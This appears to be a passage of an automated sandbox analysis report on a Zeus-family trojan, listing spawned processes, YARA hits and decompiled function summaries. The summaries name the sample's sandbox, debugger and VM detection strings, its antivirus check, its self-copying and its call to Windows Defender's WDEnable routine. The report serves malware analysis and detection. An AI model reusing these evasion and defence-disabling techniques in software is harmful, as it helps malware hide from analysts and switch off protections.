Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:47:38
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:47:38
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:47:38
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:47:38
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:47:39
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:47:39
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:47:39
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:47:40
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:47:40
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:47:40
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:47:40
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:47:40
Start date:	23/08/2024
Path:	C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"
Imagebase:	0xe10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:47:40
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	69.3%
Total number of Nodes:	280
Total number of Limit Nodes:	11

Executed Functions

Function 00402B70 Relevance: 68.4, APIs: 30, Strings: 9, Instructions: 163
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: IsDebuggerPresent.KERNEL32 ref: 00401014
Part of subcall function 00401000: FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
Part of subcall function 00401000: memset.MSVCRT ref: 0040104B
Part of subcall function 00401000: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Part of subcall function 00401000: Process32First.KERNEL32 ref: 00401071
Part of subcall function 00401000: StrStrIA.KERNELBASE(?,wireshark.exe), ref: 0040108D
Part of subcall function 00401000: Process32Next.KERNEL32(00000000,?), ref: 0040109D
Part of subcall function 00401000: GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
Part of subcall function 00401000: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004010CB
Part of subcall function 00401000: PathFileExistsA.KERNELBASE(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

LoadLibraryA.KERNEL32(user32.dll), ref: 00402B86
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B9A

Part of subcall function 00403920: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
Part of subcall function 00403920: strstr.MSVCRT ref: 00403967
Part of subcall function 00403920: GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
Part of subcall function 00403920: CharUpperA.USER32(?), ref: 00403999
Part of subcall function 00403920: strstr.MSVCRT ref: 004039AB
Part of subcall function 00403920: strstr.MSVCRT ref: 004039C4
Part of subcall function 00403920: strstr.MSVCRT ref: 004039DD
Part of subcall function 00403920: strstr.MSVCRT ref: 004039F6
Part of subcall function 00403920: strstr.MSVCRT ref: 00403A0F
Part of subcall function 00403920: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
Part of subcall function 00403920: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C

ExitProcess.KERNEL32 ref: 00402BAB
FindWindowA.USER32(____AVP.Root,00000000), ref: 00402BC2
GetTickCount.KERNEL32 ref: 00402BCE
PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402BE0
IsUserAnAdmin.SHELL32 ref: 00402C00
ExitProcess.KERNEL32 ref: 00402C11

Strings

kernel32.dll, xrefs: 00402C19
Tue Aug 2 12:53:17 20112, xrefs: 00402CCB, 00402CDF, 00402D02, 00402D12, 00402D64, 00402D74
IsWow64Process, xrefs: 00402C31
\apppatch\, xrefs: 00402C5A, 00402CAA
____AVP.Root, xrefs: 00402BBD
explorer.exe, xrefs: 00402D3E, 00402D43, 00402DA0, 00402DA5
user32.dll, xrefs: 00402B81
Pnv, xrefs: 00402D2D, 00402D8F
winlogon.exe, xrefs: 00402D37, 00402D99

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: strstr$FileFindName$ExitInformationModuleProcessProcess32UserWindow$AdminChangeCharCloseCountCreateDebuggerDirectoryExistsFirstHandleLibraryLoadMessageNextNotificationPathPostPresentSnapshotSystemTickToolhelp32UpperVolumeWindowsmemset
String ID: IsWow64Process$Pnv$Tue Aug 2 12:53:17 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
API String ID: 9317432-1956477594
Opcode ID: 284e66e4bbf4f984f0241835b871c3ec669658df2c17cadb1783e4bd5444081f
Instruction ID: 39ff8b4b23ffe36b6a173c4f6bdc5339f36d51dfac64fa60dc4ffdda49012cd9
Opcode Fuzzy Hash: 284e66e4bbf4f984f0241835b871c3ec669658df2c17cadb1783e4bd5444081f
Instruction Fuzzy Hash: 8751A1B1600215ABEB107BF1EE0EB9E36686F84745F50013AFB01B61E1DBFC9C418A6D

Function 004028B0 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C,7604DB30,00000000,00000000), ref: 004028EB
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402903
PathFileExistsA.KERNELBASE(?), ref: 00402924
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040293C
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040297D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040298D
GetCurrentProcess.KERNEL32(?), ref: 0040299E
GetTickCount.KERNEL32 ref: 004029D6

Part of subcall function 00401600: GetTickCount.KERNEL32 ref: 0040160B
Part of subcall function 00401600: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Part of subcall function 00401920: GetTickCount.KERNEL32 ref: 0040194A
Part of subcall function 00401920: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
Part of subcall function 00401920: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

_snprintf.MSVCRT ref: 00402A50
CopyFileA.KERNEL32(?,?,00000001), ref: 00402A68
RtlImageNtHeader.NTDLL(00000000), ref: 00402A9A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AC5
HeapValidate.KERNEL32(00000000), ref: 00402AC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AD4
HeapFree.KERNEL32(00000000), ref: 00402AD7
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402AF6
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B05
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B15
GetCurrentProcess.KERNEL32(?), ref: 00402B26
GlobalFindAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B44
ExitProcess.KERNEL32 ref: 00402B55
GlobalAddAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B60

Strings

Tue Aug 2 12:53:17 20111, xrefs: 00402B3F, 00402B5B
kernel32.dll, xrefs: 00402971, 00402AFC
%s_, xrefs: 00402A3E
.exe, xrefs: 00402A28
IsWow64Process, xrefs: 00402987, 00402B0F
\apppatch\, xrefs: 0040294F
svchost.exe, xrefs: 004029BA

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
String ID: %s_$.exe$IsWow64Process$Tue Aug 2 12:53:17 20111$\apppatch\$kernel32.dll$svchost.exe
API String ID: 4049655197-1703505012
Opcode ID: 8c19fc42e0cf0d5ec2b52a9f48d22261c74e53a708defb603739ef645998fcf7
Instruction ID: 7f5ae7708a7b69610b0b59458e4d7764c7ebe7900fbd9078b2849b4018493b30
Opcode Fuzzy Hash: 8c19fc42e0cf0d5ec2b52a9f48d22261c74e53a708defb603739ef645998fcf7
Instruction Fuzzy Hash: 6A715EB16043419FC710EF60DE889AB7BE8BB98300F44493EF785B72A1D7789904CB99

Function 00403920 Relevance: 42.1, APIs: 15, Strings: 9, Instructions: 128
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
strstr.MSVCRT ref: 00403967

Part of subcall function 00403870: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
Part of subcall function 00403870: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
Part of subcall function 00403870: RegCloseKey.KERNELBASE(y9@), ref: 004038CF

GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
CharUpperA.USER32(?), ref: 00403999
strstr.MSVCRT ref: 004039AB
strstr.MSVCRT ref: 004039C4
strstr.MSVCRT ref: 004039DD
strstr.MSVCRT ref: 004039F6
strstr.MSVCRT ref: 00403A0F
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A86
StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9A
StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AAC
StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403ABE

Strings

SANDBOX, xrefs: 004039A5
VIRUSCLONE, xrefs: 004039D7
test_item.exe, xrefs: 00403961
MALNETVM, xrefs: 004039BE
test user, xrefs: 004039F0
\sandbox\, xrefs: 00403AB2
Dave, xrefs: 00403A09
\sand-box\, xrefs: 00403A8E
\cwsandbox\, xrefs: 00403AA0

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: strstr$Name$FileModule$CharCloseDirectoryInformationOpenQuerySystemUpperUserValueVolumeWindows
String ID: Dave$MALNETVM$SANDBOX$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\$test user$test_item.exe
API String ID: 3012634381-649399103
Opcode ID: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction ID: 2772e22a84d8afe3dc88946ac3df406ee6e1198dc71f6cbec9561b14d5c35e9d
Opcode Fuzzy Hash: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction Fuzzy Hash: 0341CA71A5031866DF20DB608D85FEB7B6CAF54B05F0C05BAE644F51D0E6F89B848F94

Function 004021B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004022F3
DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402323
CloseHandle.KERNEL32(00000000), ref: 0040232A

Strings

", xrefs: 0040225A
T, xrefs: 004022AA
t, xrefs: 004022D4
D, xrefs: 004022B1
s, xrefs: 00402272
m, xrefs: 004022CD
g, xrefs: 00402279
m, xrefs: 004022E2
", xrefs: 00402287
S, xrefs: 00402295
E, xrefs: 004022A3
e, xrefs: 0040226B
4, xrefs: 004022B8
\\.\KmxAgent, xrefs: 004021C8
0, xrefs: 004022BF
t, xrefs: 004022E9
E, xrefs: 0040229C
d, xrefs: 00402253

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
API String ID: 33631002-3172865025
Opcode ID: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction ID: 9d4a94b5be36249e2462cbbb3280e2e36e0391c5559e4b339ada8e43b165569f
Opcode Fuzzy Hash: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction Fuzzy Hash: D04194B0D01358DEEB20CF95D9887DEFEB5BB04309F5081ADD5186B241C7B90A89CF55

Function 00401000 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 104
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401014
FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
memset.MSVCRT ref: 0040104B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Process32First.KERNEL32 ref: 00401071
StrStrIA.KERNELBASE(?,wireshark.exe), ref: 0040108D
Process32Next.KERNEL32(00000000,?), ref: 0040109D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004010CB
PathFileExistsA.KERNELBASE(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

Strings

OLLYDBG, xrefs: 00401025
\\?\globalroot\systemroot\system32\vmx_fb.dll, xrefs: 004010FF
idag.exe, xrefs: 004010E3
wireshark.exe, xrefs: 00401083
vmwaretray.exe, xrefs: 004010F1
dumpcap.exe, xrefs: 004010D5

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
API String ID: 1862551656-1290435522
Opcode ID: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction ID: c60aa232edd69d9eafc6284c2fbf788a46e5342051cb1b5dbcb922c87a134ace
Opcode Fuzzy Hash: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction Fuzzy Hash: AB31E9B160430057D310AB66AC49B6BB7ECDBD8764F01013BFF44F62E1E77C888586AA

Function 00403870 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 48
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
RegCloseKey.KERNELBASE(y9@), ref: 004038CF
RegCloseKey.ADVAPI32(y9@), ref: 004038DF

Strings

y9@, xrefs: 00403879, 004038DB, 004038CB, 0040387C, 004038CE, 004038DE
Q, xrefs: 004038E5
M, xrefs: 004038F7
SystemBiosVersion, xrefs: 004038B7
U, xrefs: 00403900
E, xrefs: 004038EE
HARDWARE\DESCRIPTION\System, xrefs: 00403884

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue
String ID: E$HARDWARE\DESCRIPTION\System$M$Q$SystemBiosVersion$U$y9@
API String ID: 1607946009-2685269968
Opcode ID: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction ID: a73e17f2ece4285d148bbbe7d21167b22b4148350c2fc20c0d473cf4689022c2
Opcode Fuzzy Hash: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction Fuzzy Hash: 951165F2E00208FAEB20DF90DC45BAA7BB89B45315F1081EAE708751C1D7B86A448F5D

Function 00402660 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228
commemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040267F
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026AD
SysAllocString.OLEAUT32(?), ref: 004026C0
SysAllocString.OLEAUT32(Windows Explorer), ref: 004026D2
CoCreateInstance.OLE32(00404E60,00000000,00004401,00404E70,?), ref: 004026FB
CoCreateInstance.OLE32(00404E80,00000000,00004401,00404E90,?), ref: 004027AF
SysFreeString.OLEAUT32(00402BFA), ref: 0040283D
SysFreeString.OLEAUT32(00000000), ref: 00402844
CoUninitialize.OLE32 ref: 0040289E

Strings

Windows Explorer, xrefs: 004026CD

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
String ID: Windows Explorer
API String ID: 1140695583-228612681
Opcode ID: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction ID: bcca5549e6a36079ff93457438ec30656b046552e7bb8440c472f06e22bdaec7
Opcode Fuzzy Hash: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction Fuzzy Hash: 3C714175A006059FCB10EB98CD84DAFB7B9AF88704B248266E904FB3D0D7B5ED42CB54

Function 004020C0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004020FE
SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402114
PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040212A
SetCurrentDirectoryA.KERNELBASE(?), ref: 00402137
LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402146
GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040215B
FreeLibrary.KERNELBASE(00000000), ref: 0040218C

Strings

WDEnable, xrefs: 00402155
Windows Defender, xrefs: 0040211E
MpClient.dll, xrefs: 00402141

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

